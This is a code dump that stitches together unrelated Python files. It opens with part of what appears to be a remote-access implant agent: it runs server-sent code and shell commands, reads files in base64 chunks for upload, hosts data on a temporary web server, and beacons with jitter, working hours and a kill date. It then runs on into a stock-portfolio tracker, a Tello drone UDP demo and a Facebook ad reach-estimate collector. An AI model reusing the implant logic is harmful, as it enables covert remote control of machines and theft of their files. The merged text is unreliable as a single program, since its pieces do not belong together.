def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
cvalue = 0-9 comp value (default 6)
'''
cdata = zlib.compress(data,cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I",crc)
built_data = header + data
return built_data
class decompress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
dict with crc32 cheack and dec data string
ex. {"crc32" : true, "dec_data" : "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return { "header_crc32" : comp_crc32, "dec_crc32" : dec_crc32, "crc32_check" : crc32, "data" : dec_data }
else:
dec_data = zlib.decompress(data)
return dec_data
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, Verbose=None):
Thread.__init__(self, group, target, name, args, kwargs, Verbose)
self._return = None
def run(self):
if self._Thread__target is not None:
self._return = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
self.run = self.__run # Force the Thread toinstall our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code)
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec code_obj in globals()
# create/processPacketstart/return the thread
# call the job_func so sys data can be cpatured
codeThread = KThread(target=job_func)
codeThread.start()
jobs.append(codeThread)
def job_func():
try:
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
# now call the function required
# and capture the output via sys
method()
sys.stdout = old_stdout
dataStats_2 = mystdout.getvalue()
result = encodePacket(110, str(dataStats_2))
processJobTasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = encodePacket(0, p)
processJobTasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print e
def get_job_message_buffer():
global jobMessageBuffer
try:
result = encodePacket(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return encodePacket(0, "[!] Error getting job output: %s" %(e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
processJobTasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = KThread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data)
def log_message(s, format, *args):
return
server_class = BaseHTTPServer.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
# additional implementation methods
def run_command(command):
if "|" in command:
command_parts = command.split('|')
elif ">" in command or ">>" in command or "<" in command or "<<" in command:
p = subprocess.Popen(command,stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return ''.join(list(iter(p.stdout.readline, b'')))
else:
command_parts = []
command_parts.append(command)
i = 0
p = {}
for command_part in command_parts:
command_part = command_part.strip()
if i == 0:
p[i]=subprocess.Popen(shlex.split(command_part),stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
p[i]=subprocess.Popen(shlex.split(command_part),stdin=p[i-1].stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
i = i +1
(output, err) = p[i-1].communicate()
exit_code = p[0].wait()
if exit_code != 0:
errorStr = "Shell Output: " + str(output) + '\n'
errorStr += "Shell Error: " + str(err) + '\n'
return errorStr
else:
return str(output)
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
################################################
#
# main agent functionality
#
################################################
while(True):
# TODO: jobs functionality
if workingHours != "":
try:
start,end = workingHours.split("-")
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# print "not in working hours, sleeping %s seconds" %(sleepTime.seconds)
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "":
now = datetime.datetime.now().date()
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
if now > killDateTime:
msg = "[!] Agent %s exiting" %(sessionID)
sendMessage(encodePacket(2, msg))
agent_exit()
# exit if we miss commnicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = 1/jitter
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = sendMessage()
if code == "200":
try:
send_job_message_buffer()
except Exception as e:
result = encodePacket(0, str('[!] Failed to check job buffer!: ' + str(e)))
processJobTasking(result)
if data == defaultPage:
missedCheckins = 0
else:
processTasking(data)
else:
pass
# print "invalid code:",code
|
invest.py
|
import tinvest
import pandas as pd
import requests
import yfinance as yf
import numpy as np
import copy
import time
import traceback
import logging
from dataclasses import dataclass
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional, Union, List, Dict, Iterable
from threading import Thread, RLock
from math import ceil
from tqdm import tqdm
import pygsheets
import telegram
from telegram.ext import Updater
import plotly.graph_objects as go
from .config import TINKOFF_API_TOKEN, GOOGLE_SA_CONFIG, BOT_TOKEN, PERSONAL_CHAT_ID
@dataclass
class Stock:
name: str
ticker: str
current_price: float
sp100_weight: float
sp100_lots: int
my_lots: int
avg_buy_price: Optional[float]
@property
def total_price(self) -> float:
return self.current_price * self.my_lots
@property
def profit(self) -> float:
return self.current_price / self.avg_buy_price - 1 if self.avg_buy_price else 0.0
@property
def expected_yield(self) -> float:
return (self.current_price - self.avg_buy_price) * self.my_lots if self.avg_buy_price else 0.0
def __copy__(self) -> 'Stock':
return Stock(self.name, self.ticker, self.current_price, self.sp100_weight, self.sp100_lots, self.my_lots, self.avg_buy_price)
class Investments:
def __init__(self, tinkoff_token: str, google_sa_config: str, history_path: str):
self._tinkoff_token = tinkoff_token
self._google_sa_config = google_sa_config
self._history_path = history_path
self._stocks = []
self._free_usd = 0.0
self._expected_portfolio_cost = 5000.0
@staticmethod
def _fix_tickers(tickers: str):
return tickers.replace('.', '-')
@staticmethod
def _get_historical_price(tickers: str, period: str, interval: str, price_type: str = 'Close') -> pd.DataFrame:
tickers = Investments._fix_tickers(tickers).split()
prices = []
for ticker in tickers:
while True:
try:
info = yf.download(ticker, period=period, progress=False, prepost=True, interval=interval, threads=False)
info = info[price_type]
break
except:
logging.warning(f'Failed to fetch current price for {ticker}, retrying in 1 second')
time.sleep(1)
prices.append(info)
result = pd.concat(prices, axis=1, join='outer')
result.columns = tickers
result = result.fillna(method='ffill').fillna(method='bfill').fillna(value=0.0)
return result
@staticmethod
def _get_today_price(tickers: str, price_type: str = 'Close') -> Union[float, List[float]]:
tickers = Investments._fix_tickers(tickers)
info = Investments._get_historical_price(tickers, period='5d', interval='1h', price_type=price_type)
today_row = info.iloc[-1, :]
prices = list(today_row)
return prices[0] if len(prices) == 1 else prices
@staticmethod
def _sample_sp100(expected_cost: float) -> Dict[str, Stock]:
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'X-Requested-With': 'XMLHttpRequest'
}
resp = requests.get('https://www.slickcharts.com/sp500', headers=headers)
sp500 = pd.read_html(resp.text)[0]
sp100 = sp500[:100]
# price * lots / budget = weight
samples = pd.DataFrame(columns=['Company', 'Ticker', 'Price', 'Weight', 'Lots'])
samples['Company'] = sp100['Company']
samples['Ticker'] = sp100['Symbol']
samples['Price'] = Investments._get_today_price(' '.join(samples['Ticker'].to_numpy()))
samples['Weight'] = sp100['Weight'] / sp100['Weight'].sum()
samples['Lots'] = (samples['Weight'] * expected_cost / samples['Price']).round().astype(int)
stocks = {}
for _, row in samples.iterrows():
stocks[row['Ticker']] = Stock(
name=row['Company'],
ticker=row['Ticker'],
current_price=row['Price'],
sp100_weight=row['Weight'],
sp100_lots=row['Lots'],
my_lots=0,
avg_buy_price=None
)
return stocks
def _get_positions(self):
client = tinvest.SyncClient(
token=self._tinkoff_token
)
return client.get_portfolio().payload.positions
def _get_operations(self):
client = tinvest.SyncClient(
token=self._tinkoff_token
)
return client.get_operations(from_=datetime.fromtimestamp(0), to=datetime.utcnow()).payload.operations
def _get_total_buy_price(self):
operations = self._get_operations()
total_buy_price = 0.0
for operation in operations:
if operation.status != tinvest.OperationStatus.done:
continue
if operation.instrument_type == tinvest.InstrumentType.currency and operation.figi == 'BBG0013HGFT4': # usd
if operation.operation_type in [tinvest.OperationType.buy, tinvest.OperationTypeWithCommission.buy]:
total_buy_price += operation.quantity
if operation.operation_type in [tinvest.OperationType.sell, tinvest.OperationTypeWithCommission.sell]:
total_buy_price -= operation.quantity
continue
if operation.currency == tinvest.Currency.usd and operation.operation_type == tinvest.OperationTypeWithCommission.pay_in:
total_buy_price += float(operation.payment)
continue
return total_buy_price
def _get_total_current_price(self):
return sum(stock.current_price * stock.my_lots for stock in self._stocks) + self._free_usd
def update_stock_info(self):
all_positions = self._get_positions()
stock_positions = list(filter(lambda pos: pos.instrument_type == tinvest.InstrumentType.stock and
pos.average_position_price.currency == tinvest.Currency.usd,
all_positions))
self._free_usd = 0.0
for pos in all_positions:
if pos.instrument_type == tinvest.InstrumentType.currency:
self._free_usd = float(pos.balance)
today_prices = [float((pos.average_position_price.value * pos.lots + pos.expected_yield.value) / pos.lots) for pos in stock_positions]
current_portfolio_cost = sum(pos.lots * price for pos, price in zip(stock_positions, today_prices))
while self._expected_portfolio_cost < current_portfolio_cost:
self._expected_portfolio_cost *= 1.5
self._expected_portfolio_cost = ceil(self._expected_portfolio_cost / 5000.0) * 5000.0
stocks = self._sample_sp100(self._expected_portfolio_cost)
for pos, price in tqdm(zip(stock_positions, today_prices)):
if pos.ticker in stocks:
stocks[pos.ticker].my_lots = pos.lots
stocks[pos.ticker].avg_buy_price = float(pos.average_position_price.value)
else:
stocks[pos.ticker] = Stock(
name=pos.name,
ticker=pos.ticker,
current_price=price,
sp100_weight=0.0,
sp100_lots=0,
my_lots=pos.lots,
avg_buy_price=float(pos.average_position_price.value)
)
ordered_stocks = list(filter(lambda stock: stock.my_lots > 0 or stock.sp100_lots > 0, stocks.values()))
ordered_stocks.sort(key=lambda stock: (-stock.sp100_weight, stock.ticker))
self._stocks = ordered_stocks
def update_spreadsheet(self):
gc = pygsheets.authorize(client_secret=None, service_account_file=self._google_sa_config)
sh: pygsheets.Spreadsheet = gc.open('invest')
wks: pygsheets.Worksheet = sh.sheet1
wks.clear(fields='*')
header: pygsheets.DataRange = wks.range('A1:E1', returnas='range')
for cell in header.cells[0]:
cell.set_text_format('bold', True)
header.update_values([['Company', 'Ticker', 'Price', 'Lots', 'Profit']])
data = []
for i, stock in enumerate(self._stocks):
row = [
pygsheets.Cell(pos=f'A{i+2}', val=stock.name),
pygsheets.Cell(pos=f'B{i+2}', val=stock.ticker),
pygsheets.Cell(pos=f'C{i+2}', val=stock.current_price),
pygsheets.Cell(pos=f'D{i+2}', val=f'{stock.my_lots}/{stock.sp100_lots}'),
pygsheets.Cell(pos=f'E{i+2}', val=stock.profit)
]
row[2].set_number_format(pygsheets.FormatType.NUMBER, pattern='0.00')
lw = stock.my_lots / max(stock.my_lots, stock.sp100_lots)
row[3].color = (1.0, lw * 2, 0, 0.8) if lw < 0.5 else (2 - lw * 2, 1.0, 0, 0.8)
row[3].set_horizontal_alignment(pygsheets.HorizontalAlignment.RIGHT)
pw = min(1, 0.5 + 0.5 * stock.profit)
row[4].color = (1.0, pw * 2, pw * 2, 0.8) if pw < 0.5 else (2 - pw * 2, 1.0, 2 - pw * 2, 0.8)
row[4].set_number_format(pygsheets.FormatType.PERCENT, pattern='0.00%')
data.extend(row)
wks.update_cells(data)
total_buy_price = self._get_total_buy_price()
total_current_price = self._get_total_current_price()
total_yield = total_current_price - total_buy_price
info_cells = [
pygsheets.Cell(pos='H2', val=f'Portfolio buy price:'),
pygsheets.Cell(pos='I2', val=total_buy_price),
pygsheets.Cell(pos='H3', val=f'Portfolio current price:'),
pygsheets.Cell(pos='I3', val=total_current_price),
pygsheets.Cell(pos='H4', val=f'Portfolio yield:'),
pygsheets.Cell(pos='I4', val=total_yield),
pygsheets.Cell(pos='H5', val=f'Target price:'),
pygsheets.Cell(pos='I5', val=self._expected_portfolio_cost)
]
for i, cell in enumerate(info_cells):
if i % 2 == 0:
cell.set_text_format('bold', True)
else:
cell.set_number_format(pygsheets.FormatType.NUMBER, pattern='0.0')
wks.update_cells(info_cells)
return sh.url
def suggest_shares(self, budget: float) -> List[str]:
shares = []
stocks = {stock.ticker: copy.deepcopy(stock) for stock in self._stocks}
def suggest_one_share() -> Optional[str]:
weights = np.zeros(len(stocks))
tickers = list(stocks.keys())
for i, ticker in enumerate(tickers):
stock = stocks[ticker]
if stock.current_price > budget or stock.my_lots >= stock.sp100_lots:
continue
weights[i] = (stock.sp100_lots - stock.my_lots) * stock.current_price
if weights.sum() == 0.0:
return None
weights /= weights.sum()
return np.random.choice(tickers, p=weights)
while True:
share_to_buy = suggest_one_share()
if share_to_buy is None:
break
shares.append(share_to_buy)
budget -= stocks[share_to_buy].current_price
stocks[share_to_buy].my_lots += 1
return shares
def update_history(self):
total_buy_price = self._get_total_buy_price()
total_current_price = self._get_total_current_price()
today = datetime.today().strftime('%Y-%m-%dT%H:%M:%S')
sp100_current_price = self._get_today_price('^OEX', 'Close')
if sp100_current_price < 1.0:
return
with Path(self._history_path).open('a') as fp:
print(f'{today}\t{total_buy_price}\t{total_current_price}\t{sp100_current_price}', file=fp)
@staticmethod
def visualize_ema(tickers: List[str]):
tickers = list(map(Investments._fix_tickers, tickers))
unique_tickers = list(set(tickers))
prices = Investments._get_historical_price(' '.join(unique_tickers), period='3mo', interval='1h')
total_price = sum(prices[ticker] for ticker in tickers)
dates = [date.strftime('%Y-%m-%d %H:%M:%S') for date in prices.index]
ema_5d = total_price.ewm(span=16*5).mean()
ema_1mo = total_price.ewm(span=16*21).mean()
fig = go.Figure()
fig.add_trace(go.Scatter(x=dates, y=total_price.to_numpy(), mode='lines', name='price'))
fig.add_trace(go.Scatter(x=dates, y=ema_5d.to_numpy(), mode='lines', name='ema_5d'))
fig.add_trace(go.Scatter(x=dates, y=ema_1mo.to_numpy(), mode='lines', name='ema_1mo'))
img = fig.to_image(format='png')
return img
def visualize_history(self):
df = pd.read_csv(self._history_path, sep='\t')
total_buy_price = df['total_buy_price'].to_numpy()
total_current_price = df['total_current_price'].to_numpy()
portfolio = np.ones_like(total_buy_price)
multiplier = np.ones_like(total_buy_price)
sp100 = df['sp100_price'] / df.loc[0, 'sp100_price']
coef, m = total_buy_price[0] / total_current_price[0], 1.0
for i in range(1, len(portfolio)):
if abs(total_buy_price[i] - total_buy_price[i - 1]) > 1.0:
m *= (total_current_price[i - 1] / total_buy_price[i - 1]) / (total_current_price[i] / total_buy_price[i])
portfolio[i] = total_current_price[i] / total_buy_price[i] * coef * m
multiplier[i] = m
fig = go.Figure()
fig.add_trace(go.Scatter(x=df['date'], y=multiplier, mode='lines', name='multiplier', line=dict(color='green')))
fig.add_trace(go.Scatter(x=df['date'], y=sp100, mode='lines', name='sp100', line=dict(color='red')))
fig.add_trace(go.Scatter(x=df['date'], y=portfolio, mode='lines', name='portfolio', line=dict(color='blue')))
img = fig.to_image(format='png')
return img
def run_invest_updater(debug=False):
def update():
try:
logging.info('Updating stock info and history')
investments.update_stock_info()
investments.update_history()
except Exception as e:
status_text = f'<b>Error</b>: Failed to update stock info\n' \
f'<b>Exception</b>: {e}\n' \
f'<b>Traceback</b>: {traceback.format_exc()}'
Updater(BOT_TOKEN).bot.send_message(PERSONAL_CHAT_ID, status_text, parse_mode=telegram.ParseMode.HTML)
def track():
while True:
if debug:
update()
else:
update_thread = Thread(target=update, daemon=False)
update_thread.start()
time.sleep(1 * 60 * 60)
if debug:
track()
else:
subthread = Thread(name='invest_updater', target=track, daemon=False)
subthread.start()
investments = Investments(TINKOFF_API_TOKEN, GOOGLE_SA_CONFIG, 'data/history.tsv')
|
tello1.py
|
"""
Low end drone with a raspberry pi to connect i
"""
import threading
import socket
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 9000))
tello_address = ('192.168.10.1', 8889)
def recv():
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print('\nExit . . .\n')
break
print('\n\nTello Python3 Demo.\n')
print('Tello: command takeoff land flip forward back left right\n')
print(' up down cw ccw speed speed?\n')
print('end -- quit demo.\n')
# recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
while True:
try:
msg = input('')
if not msg:
break
if 'end' in msg:
print('...')
sock.close()
break
# Send data
msg = msg.encode(encoding="utf-8")
sent = sock.sendto(msg, tello_address)
except KeyboardInterrupt:
print('\n . . .\n')
sock.close()
break
|
utils.py
|
# -*- coding: utf-8 -*-
import json
from tabulate import tabulate
import pandas as pd
from . import constants
import itertools
import logging
import coloredlogs
import time
from multiprocessing import Process, Manager
import numpy
import requests
import ast
import os
coloredlogs.install(level=logging.INFO)
class RequestException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class JsonFormatException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class FatalException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def print_error_warning(error_json, params):
print_warning("Facebook Error Code: " + str(error_json["error"]["code"]))
print_warning("Facebook Error Message: " + str(error_json["error"]["message"]))
if "error_user_title" in error_json["error"] and "error_user_msg" in error_json["error"]:
print_warning("Facebook: " + str(error_json["error"]["error_user_title"]) + "\n" + str(
error_json["error"]["error_user_msg"]))
print_warning("Facebook Trace Id: " + str(error_json["error"]["fbtrace_id"]))
print_warning("Request Params : " + str(params))
def get_dataframe_from_json_response_query_data(json_response):
dataframe = pd.DataFrame()
for entry in json_response["data"]:
entry_details = {}
for field in constants.DETAILS_FIELD_FROM_FACEBOOK_TARGETING_SEARCH:
entry_details[field] = entry[field] if field in entry else None
dataframe = dataframe.append(entry_details, ignore_index=True)
return dataframe
def handle_send_request_error(response, url, params, tryNumber):
try:
error_json = json.loads(response.text)
if error_json["error"]["code"] == constants.API_UNKOWN_ERROR_CODE_1 or error_json["error"][
"code"] == constants.API_UNKOWN_ERROR_CODE_2:
print_error_warning(error_json, params)
time.sleep(constants.INITIAL_TRY_SLEEP_TIME * tryNumber)
return send_request(url, params, tryNumber)
elif error_json["error"]["code"] == constants.INVALID_PARAMETER_ERROR and "error_subcode" in error_json[
"error"] and error_json["error"]["error_subcode"] == constants.FEW_USERS_IN_CUSTOM_LOCATIONS_SUBCODE_ERROR:
return get_fake_response()
elif "message" in error_json["error"] and "Invalid zip code" in error_json["error"][
"message"] and constants.INGORE_INVALID_ZIP_CODES:
print_warning("Invalid Zip Code:" + str(params[constants.TARGETING_SPEC_FIELD]))
return get_fake_response()
else:
logging.error("Could not handle error.")
logging.error("Error Code:" + str(error_json["error"]["code"]))
if "message" in error_json["error"]:
logging.error("Error Message:" + str(error_json["error"]["message"]))
if "error_subcode" in error_json["error"]:
logging.error("Error Subcode:" + str(error_json["error"]["error_subcode"]))
raise FatalException(str(error_json["error"]))
except Exception as e:
logging.error(e)
raise FatalException(str(response.text))
def send_request(url, params, tryNumber=0):
tryNumber += 1
if tryNumber >= constants.MAX_NUMBER_TRY:
print_warning("Maximum Number of Tries reached. Failing.")
raise FatalException("Maximum try reached.")
try:
response = requests.get(url, params=params, timeout=constants.REQUESTS_TIMEOUT)
except Exception as error:
raise RequestException(error.message)
if response.status_code == 200:
return response
else:
return handle_send_request_error(response, url, params, tryNumber)
def call_request_fb(row, token, account):
target_request = row[constants.TARGETING_FIELD]
payload = {
'optimize_for': "NONE",
'optimization_goal': "AD_RECALL_LIFT",
'targeting_spec': json.dumps(target_request),
'access_token': token,
}
payload_str = str(payload)
print_warning("\tSending in request: %s" % (payload_str))
url = constants.REACHESTIMATE_URL.format(account)
response = send_request(url, payload)
return response.content
def get_fake_response():
response = requests.models.Response()
response._content = constants.FAKE_DATA_RESPONSE_CONTENT
response.status_code = 200
logging.warn("Fake Response created: " + response.content)
return response
def trigger_facebook_call(index, row, token, account, shared_queue):
try:
response = call_request_fb(row, token, account)
shared_queue.put((index, response))
except RequestException:
print_warning("Warning Facebook Request Failed")
print_warning("Row: " + str(row))
print_warning("It will try again later")
shared_queue.put((index, numpy.nan))
# except Exception, e:
# print_warning("request failed because %s"%(e))
def add_mocked_column(dataframe):
dataframe["mock_response"] = dataframe["response"].apply(
lambda response: True if (constants.MOCK_RESPONSE_FIELD in str(response)) else False)
return dataframe
def add_timestamp(dataframe):
dataframe["timestamp"] = constants.UNIQUE_TIME_ID
return dataframe
def add_published_platforms(dataframe, input_json):
platforms = constants.PUBLISHER_PLATFORM_DEFAULT
if constants.API_PUBLISHER_PLATFORMS_FIELD in input_json:
platforms = input_json[constants.API_PUBLISHER_PLATFORMS_FIELD]
dataframe[constants.API_PUBLISHER_PLATFORMS_FIELD] = json.dumps(platforms)
return dataframe
def trigger_request_process_and_return_response(rows_to_request):
process_manager = Manager()
shared_queue = process_manager.Queue()
shared_queue_list = []
# Trigger Process in rows
for index, row in rows_to_request.iterrows():
token, account = get_token_and_account_number_or_wait()
p = Process(target=trigger_facebook_call, args=(index, row, token, account, shared_queue))
p.start()
p.join()
# Put things from shared list to normal list
while shared_queue.qsize() != 0:
shared_queue_list.append(shared_queue.get())
return shared_queue_list
def check_exception(p):
if p.exitcode != 0:
raise FatalException("FatalError: Check logging for clue. No way to proceed from here.")
def print_info(message):
logging.info(message)
def unstrict_literal_eval(string):
try:
value = ast.literal_eval(string)
return value
except ValueError:
return string
except SyntaxError:
return string
def load_dataframe_from_file(file_path):
dataframe = pd.DataFrame.from_csv(file_path)
return dataframe.applymap(unstrict_literal_eval)
def save_response_in_dataframe(shared_queue_list, df):
for result_tuple in shared_queue_list:
result_index = result_tuple[0]
result_response = result_tuple[1]
df.loc[result_index, "response"] = result_response
def save_skeleton_dataframe(dataframe, output_dir=""):
print_info("Saving Skeleton file: " + constants.DATAFRAME_SKELETON_FILE_NAME)
dataframe.to_csv(output_dir + constants.DATAFRAME_SKELETON_FILE_NAME)
def save_temporary_dataframe(dataframe, output_dir=""):
print_info("Saving temporary file: " + constants.DATAFRAME_TEMPORARY_COLLECTION_FILE_NAME)
dataframe.to_csv(output_dir + constants.DATAFRAME_TEMPORARY_COLLECTION_FILE_NAME)
def save_after_collecting_dataframe(dataframe, output_dir=""):
print_info("Saving after collecting file: " + constants.DATAFRAME_AFTER_COLLECTION_FILE_NAME)
dataframe.to_csv(output_dir + constants.DATAFRAME_AFTER_COLLECTION_FILE_NAME)
def save_after_collecting_dataframe_without_full_response(dataframe, output_dir=""):
dataframe = dataframe.drop('response', 1)
print_dataframe(dataframe)
print_info("Saving after collecting file: " + constants.DATAFRAME_AFTER_COLLECTION_FILE_NAME_WITHOUT_FULL_RESPONSE)
dataframe.to_csv(output_dir + constants.DATAFRAME_AFTER_COLLECTION_FILE_NAME_WITHOUT_FULL_RESPONSE)
def remove_temporary_dataframes():
for file in [constants.DATAFRAME_SKELETON_FILE_NAME, constants.DATAFRAME_TEMPORARY_COLLECTION_FILE_NAME]:
os.remove(file)
def print_warning(message):
logging.warn(message)
def load_json_data_from_response(response):
return json.loads(response.content)
def print_dataframe(df):
print(tabulate(df, headers='keys', tablefmt='psql', floatfmt=".0f"))
def build_initial_collection_dataframe():
return pd.DataFrame(columns=constants.DATAFRAME_COLUMNS)
def get_all_combinations_from_input(input_data_json):
to_combine_fields = {}
for field in constants.INPUT_FIELDS_TO_COMBINE:
try:
if isinstance(input_data_json[field], list):
field_content = input_data_json[field]
to_combine_fields[field] = field_content
if isinstance(input_data_json[field], dict):
for intra_field_key in list(input_data_json[field].keys()):
to_combine_fields[intra_field_key] = input_data_json[field][intra_field_key]
except KeyError:
print_warning("Field not expecified: " + field)
for field in list(to_combine_fields.keys()):
for index, value in enumerate(to_combine_fields[field]):
to_combine_fields[field][index] = (field, value)
all_combinations = list(itertools.product(*list(to_combine_fields.values())))
return all_combinations
def add_list_of_ANDS_to_input(list_of_ANDS_between_groups, input_data_json):
for interests_to_AND in list_of_ANDS_between_groups:
names = []
and_ors = []
for interest_to_AND in interests_to_AND:
names.append(interest_to_AND[constants.INPUT_NAME_FIELD])
if "or" not in interest_to_AND:
raise Exception("Only AND of ors are supported")
and_ors.append(interest_to_AND["or"])
new_and_interest = {
constants.INPUT_NAME_FIELD: " AND ".join(names),
"and_ors": and_ors,
"isAND": True
}
input_data_json[constants.INPUT_INTEREST_FIELD].append(new_and_interest)
def generate_collection_request_from_combination(current_combination, input_data):
targeting = build_targeting(current_combination, input_data)
dataframe_row = {}
for field in current_combination:
field_name = field[0]
value = field[1]
dataframe_row[field_name] = value
dataframe_row[constants.ALLFIELDS_FIELD] = current_combination
dataframe_row[constants.TARGETING_FIELD] = targeting
dataframe_row[constants.INPUT_NAME_FIELD] = input_data[constants.INPUT_NAME_FIELD]
return dataframe_row
def select_common_fields_in_targeting(targeting, input_combination_dictionary):
# Selecting Geolocation
geo_location = input_combination_dictionary[constants.INPUT_GEOLOCATION_FIELD]
if constants.INPUT_GEOLOCATION_LOCATION_TYPE_FIELD in geo_location:
location_type = geo_location[constants.INPUT_GEOLOCATION_LOCATION_TYPE_FIELD]
else:
location_type = constants.DEFAULT_GEOLOCATION_LOCATION_TYPE_FIELD
targeting[constants.API_GEOLOCATION_FIELD] = {
geo_location["name"]: geo_location["values"],
constants.INPUT_GEOLOCATION_LOCATION_TYPE_FIELD: location_type
}
# Selecting Age
age_range = input_combination_dictionary[constants.INPUT_AGE_RANGE_FIELD]
targeting[constants.API_MIN_AGE_FIELD] = age_range[constants.MIN_AGE] if constants.MIN_AGE in age_range else None
targeting[constants.API_MAX_AGE_FIELD] = age_range[constants.MAX_AGE] if constants.MAX_AGE in age_range else None
# Selecting genders
gender = input_combination_dictionary[constants.INPUT_GENDER_FIELD]
targeting[constants.API_GENDER_FIELD] = [gender]
# Selecting Languages
if constants.INPUT_LANGUAGE_FIELD in input_combination_dictionary:
languages = input_combination_dictionary[constants.INPUT_LANGUAGE_FIELD]
if languages:
targeting[constants.API_LANGUAGES_FIELD] = languages["values"]
else:
print_warning("No field: " + constants.INPUT_LANGUAGE_FIELD)
def get_api_field_name(field_name):
return constants.INPUT_TO_API_FIELD_NAME[field_name]
def process_dau_audience_from_response(literal_response):
aud = json.loads(literal_response)["data"][0]
audience = aud["estimate_dau"]
return int(audience)
def process_mau_audience_from_response(literal_response):
aud = json.loads(literal_response)["data"][0]
audience = aud["estimate_mau"]
return int(audience)
def post_process_collection(collection_dataframe):
# For now just capture audience
print_info("Computing Audience and DAU column")
collection_dataframe["dau_audience"] = collection_dataframe["response"].apply(
lambda x: process_dau_audience_from_response(x))
collection_dataframe["mau_audience"] = collection_dataframe["response"].apply(
lambda x: process_mau_audience_from_response(x))
collection_dataframe = add_mocked_column(collection_dataframe)
return collection_dataframe
def select_advance_targeting_type_array_ids(segment_type, input_value, targeting):
api_field_name = get_api_field_name(segment_type)
if input_value:
if "or" in input_value:
or_query = []
for or_id in input_value["or"]:
or_query.append({"id": or_id})
targeting["flexible_spec"].append({api_field_name: or_query})
if "and" in input_value:
for id_and in input_value["and"]:
## TODO: make the behavior AND query request less hacky
